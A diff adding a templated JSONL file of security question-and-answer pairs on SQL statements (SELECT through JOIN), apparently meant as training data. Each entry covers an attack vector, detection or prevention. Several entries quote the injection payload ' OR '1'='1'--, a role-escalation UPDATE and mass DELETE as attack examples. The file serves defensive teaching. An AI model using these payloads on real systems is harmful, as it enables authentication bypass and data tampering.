diff --git "a/data/phase3c/databases_phase3c.jsonl" "b/data/phase3c/databases_phase3c.jsonl"
new file mode 100644--- /dev/null
+++ "b/data/phase3c/databases_phase3c.jsonl"
@@ -0,0 +1,475 @@
+{"id": "trtp-15c80db8967e", "instruction": "What do security professionals need to know about SQL SELECT Statement?", "output": "The SELECT statement retrieves data from database tables. It's the most common SQL operation and the primary vector for SQL injection attacks. Understanding SELECT syntax is essential for both exploiting and defending against injection vulnerabilities.\n\nSecurity Relevance: SELECT statements are the foundation of data extraction attacks. SQL injection typically targets SELECT queries to extract unauthorized data. Understanding how SELECT works enables crafting injection payloads and implementing proper defenses.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064267Z", "updated_at": "2025-12-17T19:35:42.064267Z"}
+{"id": "trtp-10fa151f5839", "instruction": "What are the main parts of SQL SELECT Statement that security teams should understand?", "output": "SQL SELECT Statement consists of the following key components:\n\n- Column selection (SELECT columns)\n- Table specification (FROM table)\n- Filtering (WHERE clause)\n- Sorting (ORDER BY clause)\n- Limiting results (LIMIT/TOP)\n- Aggregation (GROUP BY, HAVING)", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064295Z", "updated_at": "2025-12-17T19:35:42.064295Z"}
+{"id": "trtp-f99f5f667fcd", "instruction": "From a security perspective, why should defenders understand SQL SELECT Statement?", "output": "SELECT statements are the foundation of data extraction attacks. SQL injection typically targets SELECT queries to extract unauthorized data. Understanding how SELECT works enables crafting injection payloads and implementing proper defenses.\n\nCommon attack vectors include:\n- UNION-based injection to append malicious SELECT\n- WHERE clause manipulation for data extraction\n- ORDER BY injection for column enumeration\n- Subquery injection in SELECT clause", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064311Z", "updated_at": "2025-12-17T19:35:42.064311Z"}
+{"id": "trtp-4f3c98f88b87", "instruction": "What attacks exploit SQL SELECT Statement?", "output": "Attack techniques involving SQL SELECT Statement:\n\n- UNION-based injection to append malicious SELECT\n- WHERE clause manipulation for data extraction\n- ORDER BY injection for column enumeration\n- Subquery injection in SELECT clause\n\nDefenders can detect these attacks by:\n- Anomalous SELECT patterns in query logs\n- Unexpected column access in audit trails\n- Query complexity anomalies", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064326Z", "updated_at": "2025-12-17T19:35:42.064326Z"}
+{"id": "trtp-d71fb3fc92fe", "instruction": "How can security teams detect attacks related to SQL SELECT Statement?", "output": "Methods for detecting SQL SELECT Statement attacks or anomalies:\n\n- Anomalous SELECT patterns in query logs\n- Unexpected column access in audit trails\n- Query complexity anomalies\n- Response size spikes indicating data extraction", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064339Z", "updated_at": "2025-12-17T19:35:42.064339Z"}
+{"id": "trtp-9d3de6c03b3f", "instruction": "What security controls mitigate SQL SELECT Statement risks?", "output": "Security controls and preventive measures for SQL SELECT Statement:\n\n- Parameterized queries for all user input\n- Column-level permissions restricting data access\n- Query complexity limits\n- Row-level security policies\n\nSELECT statements are the foundation of data extraction attacks. SQL injection typically targets SELECT queries to extract unauthorized data. Understanding how SELECT works enables crafting injection payloads and implementing proper defenses.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064351Z", "updated_at": "2025-12-17T19:35:42.064351Z"}
+{"id": "trtp-398f8db30ec2", "instruction": "Provide a code example for SQL SELECT Statement.", "output": "Example of SQL SELECT Statement:\n\n```sql\nSELECT username, email FROM users WHERE role = 'admin' ORDER BY created_at DESC LIMIT 10;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064361Z", "updated_at": "2025-12-17T19:35:42.064361Z"}
+{"id": "trtp-c18db4171804", "instruction": "What is SQL INSERT Statement and why is it important for database security?", "output": "INSERT statements add new rows to database tables. SQL injection in INSERT contexts can create unauthorized accounts, inject malicious data, or exploit stored XSS through database-stored values that are later rendered.\n\nSecurity Relevance: INSERT injection enables attackers to create backdoor accounts, inject malicious payloads stored for later execution, or corrupt data integrity. Unlike SELECT injection, INSERT attacks modify database state.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066316Z", "updated_at": "2025-12-17T19:35:42.066316Z"}
+{"id": "trtp-8d89fd7fbea4", "instruction": "Describe the technical aspects of SQL INSERT Statement.", "output": "SQL INSERT Statement consists of the following key components:\n\n- Target table specification\n- Column list\n- VALUES clause\n- INSERT...SELECT combination\n- Multi-row INSERT\n- ON DUPLICATE KEY handling", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066338Z", "updated_at": "2025-12-17T19:35:42.066338Z"}
+{"id": "trtp-aaca5c5a79f4", "instruction": "What security risks are associated with SQL INSERT Statement?", "output": "INSERT injection enables attackers to create backdoor accounts, inject malicious payloads stored for later execution, or corrupt data integrity. Unlike SELECT injection, INSERT attacks modify database state.\n\nCommon attack vectors include:\n- Account creation with elevated privileges\n- Data injection for stored XSS\n- INSERT...SELECT for data duplication\n- Bypassing validation through INSERT manipulation", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066353Z", "updated_at": "2025-12-17T19:35:42.066353Z"}
+{"id": "trtp-16505b8785ab", "instruction": "What are common attack techniques involving SQL INSERT Statement?", "output": "Attack techniques involving SQL INSERT Statement:\n\n- Account creation with elevated privileges\n- Data injection for stored XSS\n- INSERT...SELECT for data duplication\n- Bypassing validation through INSERT manipulation\n\nDefenders can detect these attacks by:\n- Unexpected INSERT operations in audit logs\n- Account creation anomalies\n- Data integrity monitoring", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066368Z", "updated_at": "2025-12-17T19:35:42.066368Z"}
+{"id": "trtp-4f9e84871d33", "instruction": "How do you detect exploitation of SQL INSERT Statement?", "output": "Methods for detecting SQL INSERT Statement attacks or anomalies:\n\n- Unexpected INSERT operations in audit logs\n- Account creation anomalies\n- Data integrity monitoring\n- Privilege assignment tracking", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066380Z", "updated_at": "2025-12-17T19:35:42.066380Z"}
+{"id": "trtp-2b43463b4e49", "instruction": "What are best practices for preventing SQL INSERT Statement?", "output": "Security controls and preventive measures for SQL INSERT Statement:\n\n- Parameterized queries for INSERT operations\n- Application-level validation before INSERT\n- Database triggers for INSERT auditing\n- Referential integrity constraints\n\nINSERT injection enables attackers to create backdoor accounts, inject malicious payloads stored for later execution, or corrupt data integrity. Unlike SELECT injection, INSERT attacks modify database state.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066392Z", "updated_at": "2025-12-17T19:35:42.066392Z"}
+{"id": "trtp-358b0ea16815", "instruction": "What does SQL INSERT Statement look like in SQL?", "output": "Example of SQL INSERT Statement:\n\n```sql\nINSERT INTO users (username, password, role) VALUES ('newuser', 'hashed_pw', 'admin');\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066403Z", "updated_at": "2025-12-17T19:35:42.066403Z"}
+{"id": "trtp-151d3f5c866f", "instruction": "How does SQL UPDATE Statement work and what are its security implications?", "output": "UPDATE modifies existing rows in database tables. Injection in UPDATE contexts can escalate privileges, modify critical data, or corrupt database integrity. UPDATE without WHERE affects all rows - a dangerous condition.\n\nSecurity Relevance: UPDATE injection enables privilege escalation (changing role to admin), data manipulation (modifying prices, balances), or mass data corruption. The WHERE clause is critical - missing WHERE updates all rows.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068178Z", "updated_at": "2025-12-17T19:35:42.068178Z"}
+{"id": "trtp-c3eefc664cb0", "instruction": "What elements make up SQL UPDATE Statement?", "output": "SQL UPDATE Statement consists of the following key components:\n\n- Target table specification\n- SET clause for column updates\n- WHERE clause for row selection\n- JOIN in UPDATE (database-specific)\n- Subqueries in SET values", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068199Z", "updated_at": "2025-12-17T19:35:42.068199Z"}
+{"id": "trtp-43eb2172eb0b", "instruction": "How can SQL UPDATE Statement lead to database security incidents?", "output": "UPDATE injection enables privilege escalation (changing role to admin), data manipulation (modifying prices, balances), or mass data corruption. The WHERE clause is critical - missing WHERE updates all rows.\n\nCommon attack vectors include:\n- Privilege escalation: UPDATE users SET role='admin' WHERE username='attacker'\n- Password reset manipulation\n- WHERE clause bypass for mass updates\n- SET clause injection for additional modifications", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068214Z", "updated_at": "2025-12-17T19:35:42.068214Z"}
+{"id": "trtp-c14d175063ac", "instruction": "How can adversaries exploit SQL UPDATE Statement?", "output": "Attack techniques involving SQL UPDATE Statement:\n\n- Privilege escalation: UPDATE users SET role='admin' WHERE username='attacker'\n- Password reset manipulation\n- WHERE clause bypass for mass updates\n- SET clause injection for additional modifications\n\nDefenders can detect these attacks by:\n- UPDATE operations on sensitive columns\n- Mass UPDATE detection (high row counts)\n- Privilege change auditing", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068229Z", "updated_at": "2025-12-17T19:35:42.068229Z"}
+{"id": "trtp-20f92d3886c8", "instruction": "How do you detect exploitation of SQL UPDATE Statement?", "output": "Methods for detecting SQL UPDATE Statement attacks or anomalies:\n\n- UPDATE operations on sensitive columns\n- Mass UPDATE detection (high row counts)\n- Privilege change auditing\n- UPDATE frequency anomalies", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068240Z", "updated_at": "2025-12-17T19:35:42.068240Z"}
+{"id": "trtp-ad01c660f64e", "instruction": "How can organizations protect against SQL UPDATE Statement?", "output": "Security controls and preventive measures for SQL UPDATE Statement:\n\n- Parameterized queries for UPDATE\n- Require WHERE clause (application logic)\n- Row-level security preventing unauthorized updates\n- Trigger-based change auditing\n\nUPDATE injection enables privilege escalation (changing role to admin), data manipulation (modifying prices, balances), or mass data corruption. The WHERE clause is critical - missing WHERE updates all rows.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068253Z", "updated_at": "2025-12-17T19:35:42.068253Z"}
+{"id": "trtp-dbb96b7b7917", "instruction": "What is the syntax for SQL UPDATE Statement?", "output": "Example of SQL UPDATE Statement:\n\n```sql\nUPDATE users SET role = 'admin', password = 'new_hash' WHERE user_id = 42;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068263Z", "updated_at": "2025-12-17T19:35:42.068263Z"}
+{"id": "trtp-59bd9c28d72f", "instruction": "What is SQL DELETE Statement and why is it important for database security?", "output": "DELETE removes rows from database tables. Injection in DELETE contexts enables data destruction, denial of service through mass deletion, or targeted removal of audit trails. DELETE without WHERE removes all rows.\n\nSecurity Relevance: DELETE injection can destroy data, remove audit evidence, or cause denial of service. Unlike SELECT, DELETE attacks directly impact data availability and integrity. Recovery requires backups.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070135Z", "updated_at": "2025-12-17T19:35:42.070135Z"}
+{"id": "trtp-69480d730035", "instruction": "What are the main parts of SQL DELETE Statement that security teams should understand?", "output": "SQL DELETE Statement consists of the following key components:\n\n- Target table specification\n- WHERE clause for row selection\n- JOIN in DELETE (database-specific)\n- TRUNCATE vs DELETE differences\n- Cascading deletes via foreign keys", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070155Z", "updated_at": "2025-12-17T19:35:42.070155Z"}
+{"id": "trtp-92c954026e70", "instruction": "From a security perspective, why should defenders understand SQL DELETE Statement?", "output": "DELETE injection can destroy data, remove audit evidence, or cause denial of service. Unlike SELECT, DELETE attacks directly impact data availability and integrity. Recovery requires backups.\n\nCommon attack vectors include:\n- Mass deletion: DELETE FROM orders (no WHERE)\n- Audit trail removal\n- Cascading delete exploitation\n- Targeted evidence destruction", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070170Z", "updated_at": "2025-12-17T19:35:42.070170Z"}
+{"id": "trtp-5e305125decb", "instruction": "How do attackers abuse SQL DELETE Statement?", "output": "Attack techniques involving SQL DELETE Statement:\n\n- Mass deletion: DELETE FROM orders (no WHERE)\n- Audit trail removal\n- Cascading delete exploitation\n- Targeted evidence destruction\n\nDefenders can detect these attacks by:\n- DELETE operations on critical tables\n- Mass DELETE detection\n- Audit log modification attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070185Z", "updated_at": "2025-12-17T19:35:42.070185Z"}
+{"id": "trtp-1989a91faf5d", "instruction": "What log entries indicate SQL DELETE Statement attacks?", "output": "Methods for detecting SQL DELETE Statement attacks or anomalies:\n\n- DELETE operations on critical tables\n- Mass DELETE detection\n- Audit log modification attempts\n- Unusual DELETE patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070196Z", "updated_at": "2025-12-17T19:35:42.070196Z"}
+{"id": "trtp-92c1831d31bd", "instruction": "What are best practices for preventing SQL DELETE Statement?", "output": "Security controls and preventive measures for SQL DELETE Statement:\n\n- Parameterized queries for DELETE\n- Soft delete patterns (is_deleted flag)\n- Required WHERE clause enforcement\n- Point-in-time recovery capability\n\nDELETE injection can destroy data, remove audit evidence, or cause denial of service. Unlike SELECT, DELETE attacks directly impact data availability and integrity. Recovery requires backups.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070208Z", "updated_at": "2025-12-17T19:35:42.070208Z"}
+{"id": "trtp-2e9b5f65f83e", "instruction": "Describe SQL WHERE Clause and its role in database security.", "output": "The WHERE clause filters rows based on conditions. It's the primary injection point for most SQL injection attacks. WHERE clause logic determines which rows are affected by SELECT, UPDATE, or DELETE operations.\n\nSecurity Relevance: WHERE clause injection is the classic SQL injection vector. Attackers modify WHERE logic to bypass authentication, extract data, or affect unintended rows. The ' OR '1'='1' payload exploits WHERE clause boolean logic.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071779Z", "updated_at": "2025-12-17T19:35:42.071779Z"}
+{"id": "trtp-ef5327725a3d", "instruction": "What elements make up SQL WHERE Clause?", "output": "SQL WHERE Clause consists of the following key components:\n\n- Comparison operators (=, <>, <, >, <=, >=)\n- Logical operators (AND, OR, NOT)\n- Pattern matching (LIKE, wildcards)\n- NULL handling (IS NULL, IS NOT NULL)\n- IN and NOT IN operators\n- BETWEEN for ranges", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071799Z", "updated_at": "2025-12-17T19:35:42.071799Z"}
+{"id": "trtp-9d65833c0a75", "instruction": "Why is SQL WHERE Clause important for database security?", "output": "WHERE clause injection is the classic SQL injection vector. Attackers modify WHERE logic to bypass authentication, extract data, or affect unintended rows. The ' OR '1'='1' payload exploits WHERE clause boolean logic.\n\nCommon attack vectors include:\n- Tautology: ' OR '1'='1'--\n- Authentication bypass through WHERE manipulation\n- Comment injection to remove WHERE conditions\n- Boolean-based blind injection", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071814Z", "updated_at": "2025-12-17T19:35:42.071814Z"}
+{"id": "trtp-078fbf8c7460", "instruction": "How can adversaries exploit SQL WHERE Clause?", "output": "Attack techniques involving SQL WHERE Clause:\n\n- Tautology: ' OR '1'='1'--\n- Authentication bypass through WHERE manipulation\n- Comment injection to remove WHERE conditions\n- Boolean-based blind injection\n\nDefenders can detect these attacks by:\n- SQL syntax in user input (quotes, OR, AND)\n- Always-true conditions in WHERE clauses\n- Comment sequences in parameters", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071828Z", "updated_at": "2025-12-17T19:35:42.071828Z"}
+{"id": "trtp-a8f1decd32a9", "instruction": "What indicators reveal malicious activity involving SQL WHERE Clause?", "output": "Methods for detecting SQL WHERE Clause attacks or anomalies:\n\n- SQL syntax in user input (quotes, OR, AND)\n- Always-true conditions in WHERE clauses\n- Comment sequences in parameters\n- Query result set anomalies", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071840Z", "updated_at": "2025-12-17T19:35:42.071840Z"}
+{"id": "trtp-95cb118c296e", "instruction": "How do you defend against SQL WHERE Clause attacks?", "output": "Security controls and preventive measures for SQL WHERE Clause:\n\n- Parameterized queries bind values safely\n- Input validation for expected formats\n- Stored procedures with defined parameters\n- Least privilege reducing impact\n\nWHERE clause injection is the classic SQL injection vector. Attackers modify WHERE logic to bypass authentication, extract data, or affect unintended rows. The ' OR '1'='1' payload exploits WHERE clause boolean logic.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071852Z", "updated_at": "2025-12-17T19:35:42.071852Z"}
+{"id": "trtp-70d33f8ff88a", "instruction": "What does SQL WHERE Clause look like in SQL?", "output": "Example of SQL WHERE Clause:\n\n```sql\nSELECT * FROM products WHERE category = 'Electronics' AND price BETWEEN 100 AND 500;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071863Z", "updated_at": "2025-12-17T19:35:42.071863Z"}
+{"id": "trtp-4826ec86cc66", "instruction": "How does SQL JOIN Operations work and what are its security implications?", "output": "JOIN combines rows from multiple tables based on related columns. Understanding JOINs is crucial for comprehending complex injection attacks that span multiple tables and for analyzing database schemas during exploitation.\n\nSecurity Relevance: JOINs expose relationships between tables. Attackers use JOINs in injection to access data across table boundaries. Understanding JOINs helps in both exploitation (extracting related data) and defense (query complexity limits).", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074216Z", "updated_at": "2025-12-17T19:35:42.074216Z"}
+{"id": "trtp-2ae59ca901c2", "instruction": "Describe the technical aspects of SQL JOIN Operations.", "output": "SQL JOIN Operations consists of the following key components:\n\n- INNER JOIN (matching rows only)\n- LEFT/RIGHT OUTER JOIN\n- FULL OUTER JOIN\n- CROSS JOIN (Cartesian product)\n- Self-joins\n- Multiple table joins", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074237Z", "updated_at": "2025-12-17T19:35:42.074237Z"}
+{"id": "trtp-97f6c368ee23", "instruction": "From a security perspective, why should defenders understand SQL JOIN Operations?", "output": "JOINs expose relationships between tables. Attackers use JOINs in injection to access data across table boundaries. Understanding JOINs helps in both exploitation (extracting related data) and defense (query complexity limits).\n\nCommon attack vectors include:\n- JOIN injection to access related tables\n- CROSS JOIN for denial of service (Cartesian explosion)\n- Information disclosure through JOIN results\n- Privilege escalation via JOIN to admin tables", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074252Z", "updated_at": "2025-12-17T19:35:42.074252Z"}
